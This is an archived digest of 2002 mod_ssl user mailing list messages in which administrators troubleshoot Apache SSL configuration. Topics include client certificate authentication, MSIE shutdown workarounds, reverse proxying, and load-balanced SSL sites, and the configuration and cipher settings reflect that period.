6070008 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 24 10:16:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA03799; Thu, 24 Jan 2002 10:15:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id KAA03737; Thu, 24 Jan 2002 10:14:23 +0100 (MET) Received: (qmail 10119 invoked by uid 500); 24 Jan 2002 10:15:09 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 24 Jan 2002 10:15:09 -0000 Date: Thu, 24 Jan 2002 10:15:09 +0000 (GMT) From: Laurie Young To: Subject: RE: Apache 2 + SSL Problems In-Reply-To: <1011806988.7360.1.camel@UberGeek> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I was using the most recent release 2.0.28 (?) On 23 Jan 2002, Austin Gonyou wrote: > What version of Apache 2 were you using? > > On Wed, 2002-01-23 at 11:50, Laurie Young wrote: > > > > I tried using the default files, and still had the same problem even > > thoguh the ssl_engine.log was cliaming everythign is ok > > > > I ahve now gone back to apache 1.3.22 and got it working > > > > Laurie > > > > > > > > On Tue, 22 Jan 2002, MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1) wrote: > > > > > Hi Laurie, > > > To eliminate any confusion regarding configuration, can you pl. > > use > > > the standard httpd.conf and the ssl.conf that's installed when 2.0.28 > > is > > > installed.. The only extra thing you'll have to do is to create the > > > certificate.. Incase you don't have any previousely created certs., > > you can > > > use the attached script to generate dummy certs. Pl. note that this > > script > > > is derived off Ralf's original script - let me know if you run into > > > problems.. (to get help, just type "./mkcert.sh").. > > > BTW, I believe you have to explicitly tell the server to listen > > on > > > 443. > > > > > > -Madhu > > > > > > > > > -----Original Message----- > > > From: Laurie Young [mailto:laurie@wildfalcon.com] > > > Sent: Tuesday, January 22, 2002 4:47 AM > > > To: 'modssl-users@modssl.org' > > > Subject: Re: Apache 2 + SSL Problems > > > > > > > > > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > > > > > Hi Laurie! > > > > On Tue, 22 Jan 2002, Laurie Young wrote: > > > > > > > > > I have tried starting it with > > > > > ./apachectrl start > > > > > and with > > > > > ./apachectrl startssl > > > > > > > > > > both give the same errors > > > > > > > > > > It would be good if someone could have a look at my httpd.config > > file, > > > > > which I have included as an attachment > > > > > > > > > I don't remember if you said how did you compiled the SSL support > > (deleted > > > > the mesgs) was it as a loadable module? If so, add a LoadModule > > directive, > > > > cause: > > > > > > I had some problems with DSO (apxs insisted on producing .la files > > instead > > > of .dso files) so I gave up on that and compilied modssl into the main > > > apache binary > > > > > > > > > > > > > > > PidFile logs/httpd.pid > > > > > Timeout 300 > > > > > Listen 8080 > > > > > Listen 443 > > > > ....^ you listen on 443 either mod_ssl is loaded or not. > > > > > > I wasn't sure if I had to explicitly tel the server to listen to 443. > > Do > > > I? > > > > > > > > > > > > > > > > > > > > > > .................^ virtual host where sslengine is on sais a > > different IP > > > > than what you've tried from command line (namely 127.0.0.1 aka > > localhost). > > > > > > 146.169.4.13 is the real world IP for the machine I am running on, I > > have > > > tried connecting to localhost, 127.0.0.1, 146.169.3.14 and > > > stone.doc.ic.ac.uk (the FQDN of the host) but all have the same error > > ;-( > > > > > > > > > Laurie > > > > > > > > > > -- > > ================================================== > > Laurie Robert Young > > laurie@wildfalcon.com | laurie@doc.ic.ac.uk > > www.wildfalcon.com | www.doc.ic.ac.uk/~laurie > > ICQ UIN #20194782 > > ================================================== > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 24 14:40:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA17565; Thu, 24 Jan 2002 14:39:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from fileserver.MAINNET.faisalfinans.com id OAA17511; Thu, 24 Jan 2002 14:39:00 +0100 (MET) Received: from pcerkan ([172.16.1.82]) by fileserver.MAINNET.faisalfinans.com with Microsoft SMTPSVC(5.0.2195.2966); Thu, 24 Jan 2002 15:36:58 +0200 Message-ID: <01f201c1a4dc$3248d980$520110ac@MAINNET.faisalfinans.com> From: "Erkan Durmus" To: Subject: ca server certificates Date: Thu, 24 Jan 2002 15:36:58 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01EF_01C1A4EC.F5C881C0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-OriginalArrivalTime: 24 Jan 2002 13:36:58.0623 (UTC) FILETIME=[324508F0:01C1A4DC] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Erkan Durmus" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_01EF_01C1A4EC.F5C881C0 Content-Type: text/plain; charset="iso-8859-9" Content-Transfer-Encoding: quoted-printable Hi, We are using Apache/1.3.9 (Unix) mod_ssl/2.4.10 and we could = authenticate our windows 2000 ca server certificates to whole part of = server.How can I authenticate my clients for a particular URL based on = certificates but still allow arbitrary clients to access the remaining = parts of the server.We configured httpds.conf as: SSLVerifyClient require SSLVerifyDepth 1 But it didnt worked.We get an error message from browser(internet = explorer version 5.0) Method Not Allowed The requested method POST is not allowed for the URL = /pls/secureclient/LOGIN.shtml.=20 -------------------------------------------------------------------------= ------- Apache/1.3.9 Server at appsvr Port 443 ------=_NextPart_000_01EF_01C1A4EC.F5C881C0 Content-Type: text/html; charset="iso-8859-9" Content-Transfer-Encoding: quoted-printable
Hi,
We are using =20 Apache/1.3.9 (Unix) mod_ssl/2.4.10 and we=20 could authenticate our windows 2000 ca server certificates to whole part = of=20 server.How can I authenticate my clients for a particular URL = based on=20 certificates but still allow arbitrary clients to access the remaining = parts of=20 the server.We configured httpds.conf = as:

<Location = /pls/secureclient>

SSLVerifyClient require

SSLVerifyDepth 1

</Location>

But it didnt worked.We get an error message from = browser(internet=20 explorer version 5.0)

Method Not Allowed

The requested method POST is not allowed for the URL=20 /pls/secureclient/LOGIN.shtml.

 

Apache/1.3.9 Server at appsvr Port=20 443
------=_NextPart_000_01EF_01C1A4EC.F5C881C0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 24 15:55:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA23604; Thu, 24 Jan 2002 15:54:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA23570; Thu, 24 Jan 2002 15:53:30 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g0OEqrv20843 for ; Thu, 24 Jan 2002 14:53:14 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Thu, 24 Jan 2002 14:55:06 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066CED@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: strange problem with unclean shutdown Date: Thu, 24 Jan 2002 14:55:19 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >-----Original Message----- >From: Andreas Gietl [mailto:a.gietl@e-admin.de] >Sent: 23 January 2002 18:13 >To: modssl-users@modssl.org >Subject: strange problem with unclean shutdown > > >hi, > >i've got a really really strange problem with mod_ssl >2.8.5-1.3.22 on Apache >1.3.22 with openssl 0.9.6c. > >As we all know MSIE needs the unclean-shutdown to sucessfully >work with >mod_ssl. This is why we add the SetEnvIf for this Browser. >(full vhost-config >see below). The strange thing is that this for some reason >seems not to match >IE 5.01 and 5.5. >This are the user-agent for these browsers: > >Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT) >Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DT) > >Versions > 6 worked. Others not tested. > >The certificate is issued let's say for www.defaulthost.de. >And not it is >really getting unbelievable: >if i connect to defaulhost.de it's doing the unclean-shutdown and to >www.defaulhost.de it is doing a standard-shutdown, which does not work. >Connecting to www.defaulhost.de does give the ie >standard-error-page. There's >no HTTP-Request in the access_log, just in the SSLLog an entry that it >connected and quited with standard shutdown. > >Any ideas? > >Andreas > >Here's the config: > ># ># Global SSL ># > >AddType application/x-x509-ca-cert .cer >AddType application/x-pkcs7-crl .crl > >#SSLPassPhraseDialog builtin >SSLSessionCache dbm:/tmp/ssl_scache >SSLSessionCacheTimeout 100 >#SSLMutex file:domlogs/ssl_mutex >#SSLRandomSeed startup builtin >#SSLRandomSeed connect builtin > >#SSLLog domlogs/ssl_engine_log >#SSLLogLevel debug > ># SSL - Virtual-Host > > >ServerName www.defaulthost.de >ServerAdmin webmaster@defaulthost.de >DocumentRoot /home/defaulthost/public_html > >SSLEngine on > >SSLCipherSuite >ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > >ErrorLog domlogs/defaulthost.errors.https >CustomLog domlogs/defaulthost.de.ssl combined >SetEnvIf User-Agent "MSIE" nokeepalive ssl-unclean-shutdown >downgrade-1.0 >force-response-1.0 > >CustomLog domlogs/defaulthost.de.ssl_request_log \ > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > >SSLCertificateFile /usr/local/apache/conf/cert/www.defaulthost.de.cer >SSLCertificateKeyFile >/usr/local/apache/conf/cert/www.defaulthost.de.key >ScriptAlias /cgi-bin/ /home/defaulhost/public_html/cgi-bin/ > > I notice that you are using the dbm ssl session cache. What happens if you try the shm ssl session cache? Some people have reported that things start working after using shm. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 08:08:51 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA29785; Fri, 25 Jan 2002 08:06:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id IAA29412; Fri, 25 Jan 2002 08:02:30 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g0OGQ5h2703928 for modssl-users@modssl.org; Thu, 24 Jan 2002 17:26:05 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0AKGa; Thu Jan 24 17:25:55 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id RAA02585 for ; Thu, 24 Jan 2002 17:25:08 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id RAA83727 for modssl-users@modssl.org; Thu, 24 Jan 2002 17:24:35 +0100 (MET) Date: Thu, 24 Jan 2002 17:24:35 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: strange problem with unclean shutdown Message-ID: <20020124172434.A7207812@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <1011811939.1018.0.camel@devotchka.sonicopia.com> <1011818751.1018.8.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1011818751.1018.8.camel@devotchka.sonicopia.com>; from jon@divisionbyzero.com on Wed, Jan 23, 2002 at 12:45:50PM -0800 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Wed, Jan 23, 2002 at 12:45:50PM -0800, jon schatz wrote: > SetEnv downgrade-1.0 > SetEnv force-response-1.0 > > inside of the ssl virtualhost container, but they're still being > ignored, and the errors still show up in the log. How do you tell they're being ignored? The access log isn't the place to check that, as it only contains the protocol the browser initially send in the request, not which protocol was used to answer the request. Test this using OpenSSL's s_client: openssl s_client -quiet -connect server:443 < from visp.engelschall.com id IAA03756; Fri, 25 Jan 2002 08:43:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 446CD4CE77B; Fri, 25 Jan 2002 08:43:25 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0P7hBQ35000; Fri, 25 Jan 2002 08:43:11 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ncircle.com id IAA00217; Fri, 25 Jan 2002 08:11:17 +0100 (MET) Received: from there (fw-dmz.ncircle.com [209.140.253.129]) by mail.ncircle.com (8.11.3/8.11.6) with SMTP id g0ONmrE07457; Thu, 24 Jan 2002 15:48:53 -0800 (PST) (envelope-from mmurray@ncircle.com) Message-Id: <200201242348.g0ONmrE07457@mail.ncircle.com> Content-Type: text/plain; charset="iso-8859-1" From: Mike Murray Organization: nCircle To: users@httpd.apache.org, modssl-users@modssl.org Subject: SSL Proxy with Strong Authentication Date: Thu, 24 Jan 2002 15:48:38 -0800 X-Mailer: KMail [version 1.3] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mike Murray X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all, I'm investigating using Apache and SSL for (reverse) proxying HTTPS requests; however, one of the requirements of the task is to have a strong auth mechanism in place. I had two ideas, both of which have lead me to a dead end: 1. Use the ProxyPass and ProxyPassReverse directives to authorize connections, and requiring client certs to authenticate to the server. 2. Using a normal SSL page to authenticate via client certs, and using an .htaccess file in the DocRoot of the proxy server to auth IP addresses. Both seemed likely, and both have failed. The first because the directives don't work as I had hoped, and the second because I can't find anywhere to put an .htaccess file that makes sense to the section. So, this is a two-part question: first, does anybody have any idea on how to use .htaccess to control access to the proxy, and/or, does anybody have any ideas on what will accomplish this task? Thanks, Mike - -- | Mike Murray | Scientific Technologist http://www.nCircle.com | nCircle Network Security -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8UJ1WSZ6Dtue7Vb4RAsDDAJwMg0CCcY70/0ombK2ryyN7LkF1ugCfQHsy 42fEW4GwPOUph+5Jo8tQPBo= =gyM/ -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 09:19:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07214; Fri, 25 Jan 2002 09:18:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from aples1.jhuapl.edu id JAA07192; Fri, 25 Jan 2002 09:18:12 +0100 (MET) Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19) id ; Thu, 24 Jan 2002 17:34:14 -0500 Message-ID: From: "Yu, Ming" To: "'modssl-users@modssl.org'" Subject: Apache SSL redundancy Date: Thu, 24 Jan 2002 17:34:45 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yu, Ming" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Does anyone have information about how to build redundant apache web site with SSL? Thanks - Ming Yu ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 14:43:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03325; Fri, 25 Jan 2002 14:42:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from riker.skynet.be id OAA03309; Fri, 25 Jan 2002 14:41:52 +0100 (MET) Received: from [192.168.212.127] (big.customer.skynet.be [194.78.172.71]) by riker.skynet.be (8.11.6/8.11.6/Skynet-OUT-2.16) with ESMTP id g0PDfm505086 for ; Fri, 25 Jan 2002 14:41:48 +0100 (MET) (envelope-from ) User-Agent: Microsoft-Entourage/10.0.0.1331 Date: Fri, 25 Jan 2002 14:41:46 +0100 Subject: Re: Apache SSL redundancy From: Thierry Coopman To: Message-ID: In-Reply-To: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thierry Coopman X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm trying to do this. The main problem is HTTPS session IDs I guess. This makes load-balancing a bit more complicated since you need to forward every request to the same server that has the sessionID. This is doable with Linux LVS, your firewall or with HW load-balancing kit. Now, what ahppens on a failure? - The server(s) that still exist can take over the ip address of the failing server - The LoadBalancing system detects it and doesn't use the machine any more. On the SSL side, since the server that fails over doesn't have the SSL session, the browser connecting to it fails to communicate. I'm not sure if it is safe to use the same cert for every machine, or that it is a requirement to have the same cert on every machine. Verisign requires you to ask for a different certificate for every server (with a different OU) in a cluster. (I think this is just a commercial reason, not a technical reason, but I'm not sure) It is possible to sync the session cache over different hosts with things like Splash but I haven't found an implementation with mod_ssl (only Apache-SSL) I would be gratefull if someone has a clean solution or if there is someone with experience on trying to accomplish this. On 24-01-2002 23:34, "Yu, Ming" wrote: > Does anyone have information about how to build redundant apache web site > with SSL? > > Thanks > > - Ming Yu > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 14:47:46 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03698; Fri, 25 Jan 2002 14:46:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.istop.com id OAA03667; Fri, 25 Jan 2002 14:46:07 +0100 (MET) Received: by ns.istop.com (Postfix, from userid 506) id F02ED17049; Fri, 25 Jan 2002 08:48:03 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by ns.istop.com (Postfix) with ESMTP id EE41C17048 for ; Fri, 25 Jan 2002 08:48:03 -0500 (EST) Date: Fri, 25 Jan 2002 08:48:03 -0500 (EST) From: Jeffrey Burgoyne X-Sender: burgoyne@cpu1693.adsl.bellglobal.com To: "modssl-users@modssl.org" Subject: Re: Apache SSL redundancy In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jeffrey Burgoyne X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users A more expensive solution would be using a hardware based SSL switch up front like the Nortel Alteon series. Jeff On Fri, 25 Jan 2002, Thierry Coopman wrote: > Hi, > > I'm trying to do this. The main problem is HTTPS session IDs I guess. This > makes load-balancing a bit more complicated since you need to forward every > request to the same server that has the sessionID. This is doable with Linux > LVS, your firewall or with HW load-balancing kit. > > Now, what ahppens on a failure? > - The server(s) that still exist can take over the ip address of the failing > server > - The LoadBalancing system detects it and doesn't use the machine any more. > > On the SSL side, since the server that fails over doesn't have the SSL > session, the browser connecting to it fails to communicate. > > I'm not sure if it is safe to use the same cert for every machine, or that > it is a requirement to have the same cert on every machine. > > Verisign requires you to ask for a different certificate for every server > (with a different OU) in a cluster. (I think this is just a commercial > reason, not a technical reason, but I'm not sure) > > It is possible to sync the session cache over different hosts with things > like Splash but I haven't found an > implementation with mod_ssl (only Apache-SSL) > > I would be gratefull if someone has a clean solution or if there is someone > with experience on trying to accomplish this. > > > On 24-01-2002 23:34, "Yu, Ming" wrote: > > > Does anyone have information about how to build redundant apache web site > > with SSL? > > > > Thanks > > > > - Ming Yu > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 15:07:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA05622; Fri, 25 Jan 2002 15:06:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id PAA05541; Fri, 25 Jan 2002 15:05:34 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 4D66BBD2B; Fri, 25 Jan 2002 15:05:21 +0100 (CET) Date: Fri, 25 Jan 2002 15:05:21 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache SSL redundancy Message-ID: <20020125140521.GB13820@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Jan 25, 2002 at 02:41:46PM +0100, Thierry Coopman wrote: > Hi, > > I'm trying to do this. The main problem is HTTPS session IDs I guess. This > makes load-balancing a bit more complicated since you need to forward every > request to the same server that has the sessionID. This is doable with Linux > LVS, your firewall or with HW load-balancing kit. > Well, RR DNS would also be an option as a low cost solution. Either way you should be more or less ok, because most load balancers will direct one client to the same server as long as that server is up. Anyway, most browsers will end an SSL session after a couple of minutes (MSIE) > Now, what ahppens on a failure? > - The server(s) that still exist can take over the ip address of the failing > server > - The LoadBalancing system detects it and doesn't use the machine any more. > > On the SSL side, since the server that fails over doesn't have the SSL > session, the browser connecting to it fails to communicate. > That shouldn't be the case - if the session is either unavailable or has expired on the server side, then the server and client will just negotiate a new session. > I'm not sure if it is safe to use the same cert for every machine, or that > it is a requirement to have the same cert on every machine. > The only way it would be unsafe is because it is on more servers. > Verisign requires you to ask for a different certificate for every server > (with a different OU) in a cluster. (I think this is just a commercial > reason, not a technical reason, but I'm not sure) > Not technical reason whatsoever. > It is possible to sync the session cache over different hosts with things > like Splash but I haven't found an > implementation with mod_ssl (only Apache-SSL) > IIRC mod_ssl has vendor hooks for the session cache, which should make reusing Splash fairly simple (I haven't looked at Splash for a long time) > I would be gratefull if someone has a clean solution or if there is someone > with experience on trying to accomplish this. > I'm not really convinced that it is worth the extra effort. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 15:17:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA06975; Fri, 25 Jan 2002 15:16:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dns.graphimedia.it id PAA06871; Fri, 25 Jan 2002 15:15:27 +0100 (MET) Received: from alpc (nobody@localhost [127.0.0.1]) by dns.graphimedia.it (8.9.3/8.8.7) with SMTP id PAA00502 for ; Fri, 25 Jan 2002 15:15:25 +0100 From: "Alberto Guglielmo" To: Subject: R: SSL Proxy with Strong Authentication Date: Fri, 25 Jan 2002 15:15:24 +0100 Message-ID: <000201c1a5aa$bccc1800$03786e3e@tcpsas.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <200201242348.g0ONmrE07457@mail.ncircle.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Alberto Guglielmo" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I don't think client cerificates are a "strong" mean of authentication but.... You should create one virtual host per reverse-proxy (don't forget the Listen xxx directives...) and put these lines in your httpd.conf: SSLEngine on SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key SSLCACertificateFile /usr/local/apache/conf/ssl.crt/ca-bundle.crt SSLVerifyClient require SSLVerifyDepth 4 SSLOptions +FakeBasicAuth +StdEnvVars ProxyPass / http://your.destinatiom.host/ ProxyPassReverse / http://your.destination.host/ # # Restrict access with Certificates # SSLRequireSSL AuthName "OpenSCEP" AuthType Basic AuthUserFile /usr/local/apache/auth/proxy1 require valid-user Order allow,deny Allow from all In the file /usr/local/apache/auth/proxy1 you put one line per client certificate as this: CompleteDistinguishedNameInCertificate:xxj31ZMTZzkVA If you need only to verify that the client has a certificate (from you) you can omit the lines 2, 3, 4 and 5 after and be sure that you have ONLY your CA certficate in ca-bundle.crt Regards Alberto Guglielmo a.guglielmo@tcpsas.com Key Fingerprint:7EAF 9E34 2838 7C6B EE47 E8F0 FFC5 3CBC 90AA 5EEE PGP Keys at: http://pgpkeys.mit.edu:11371 -----Messaggio originale----- Da: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]Per conto di Mike Murray Inviato: venerdì 25 gennaio 2002 0.49 A: users@httpd.apache.org; modssl-users@modssl.org Oggetto: SSL Proxy with Strong Authentication *** PGP Signature Status: unknown *** Signer: Unknown, Key ID = 0xE7BB55BE *** Signed: 25/01/2002 0.48.38 *** Verified: 25/01/2002 10.27.05 *** BEGIN PGP VERIFIED MESSAGE *** Hi all, I'm investigating using Apache and SSL for (reverse) proxying HTTPS requests; however, one of the requirements of the task is to have a strong auth mechanism in place. I had two ideas, both of which have lead me to a dead end: 1. Use the ProxyPass and ProxyPassReverse directives to authorize connections, and requiring client certs to authenticate to the server. 2. Using a normal SSL page to authenticate via client certs, and using an .htaccess file in the DocRoot of the proxy server to auth IP addresses. Both seemed likely, and both have failed. The first because the directives don't work as I had hoped, and the second because I can't find anywhere to put an .htaccess file that makes sense to the section. So, this is a two-part question: first, does anybody have any idea on how to use .htaccess to control access to the proxy, and/or, does anybody have any ideas on what will accomplish this task? Thanks, Mike -- | Mike Murray | Scientific Technologist http://www.nCircle.com | nCircle Network Security *** END PGP VERIFIED MESSAGE *** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 25 15:46:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA10128; Fri, 25 Jan 2002 15:44:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA10063; Fri, 25 Jan 2002 15:43:40 +0100 (MET) From: 